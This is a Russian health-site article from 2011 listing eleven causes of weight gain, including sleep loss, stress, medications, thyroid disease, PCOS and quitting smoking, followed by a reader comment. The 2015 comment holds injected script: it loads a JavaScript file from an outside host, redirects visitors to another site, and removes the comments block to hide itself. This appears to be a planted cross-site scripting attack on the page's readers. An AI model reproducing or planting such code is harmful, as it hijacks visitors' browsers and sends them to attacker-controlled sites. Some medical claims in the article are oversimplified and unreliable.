Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ожирение на пустом месте ...  >>  Ожирение на пустом месте не возникает
 
Обратная связь
 

Ожирение на пустом месте не возникает

Размер шрифта
23 сентября 2011 06:01
  • google_analytics: false
  • Нравится

Растолстеть можно, даже если соблюдать режим здорового питания и заниматься спортом. В чем же дело?


  1. Недостаток сна

Увеличение веса из-за недостатка сна имеет два объяснения. Во-первых, отсутствие сна приводит к изменению уровня гормонов, а это влияет на аппетит и усиливает чувство голода. Если вы ложитесь поздно, то, скорее всего, чаще перекусываете.


  1. Стресс

Во время стресса наш организм выделяет «гормон стресса» – кортизол. А он повышает аппетит. Неудивительно, что многие люди в стрессовых ситуациях «успокаиваются» лишними калориями.


  1. Антидепрессанты

Увеличение массы тела – это побочный эффект от употребления антидепрессантов, который встречается в 25% случаев их применения. Кроме того, сама депрессия тоже может приводить к увеличению веса, так как связана со стрессом.


  1. Стероиды

Противовоспалительные стероидные препараты удерживают в организме жидкость и повышают аппетит. Кроме того, во время приема этих препаратов происходит перераспределение жира в организме, он перемещается на шею и лицо.


  1. И другие лекарства

Антидепрессанты и стероиды не единственные лекарственные препараты, которые ведут к повышению веса. В этот список входят лекарства против психических расстройств (например, шизофрении), средства от мигрени, высокого кровяного давления и диабета. Консультируйтесь с врачом, чтобы найти безопасный вариант.


  1. Противозачаточные средства

Вопреки стереотипам, убедительных доказательств того, что противозачаточные препараты ведут к ожирению – нет. Иногда они могут привести к задержке жидкости в организме, но это временное явление.


  1. Дело в щитовидке?

Болезнь гипотиреоз – это недостаток гормонов щитовидной железы. Заболевание вызывает замедление обмена веществ, что часто приводит к набору веса. Существуют лекарственные препараты, которые ликвидируют эти симптомы. Болезнь диагностируется врачом.



  1. Менопауза не при чем

В том, что после менопаузы появляется лишний вес, виноват не уровень гормонов. Причина в том, что старение замедляет обмен веществ. Кроме того, изменение образа жизни на пенсии приводит к тому, что организм сжигает меньше калорий.


  1. Проблемы с гормонами

Иногда организм вырабатывает слишком много гормона кортизола, а это и вызывает лишний вес. Такое расстройство называется синдром Кушинга. Он появляется, если вы принимаете стероиды для лечения астмы, артрита или волчанки.


  1. Cиндром поликистозных яичников

Еще одно чреватое лишним весом заболевание. На яичниках женщины образуются кисты, что приводит к гормональному сбою и развитию устойчивости к инсулину. А это – причина набора веса.


  1. Отказ от курения

Нередко вес набирают те, кто бросил курить. Это происходит потому, что никотин притупляет аппетит, а отказ от него, вдобавок, улучшает вкусовые качества. Есть хочется больше.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как добавить 20 лет к жизни   Как спрятать второй подбородок   Ошибочный диагноз, который вы ставите себе сами   Три типа ожирения  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
23 августа 2011Женщины толстеют после свадьбы, мужчины – после развода 19 августа 2011Американка хочет весить тонну
 

Слайдшоу

1
Еда, которая вызывает рак и ожирение! Вы едите ее каждый день!
Как нас обманывают! Продукты-обманщики!
10 вещей, которые поймут только те, кто хочет похудеть

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Хорошо ли Вы спите?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.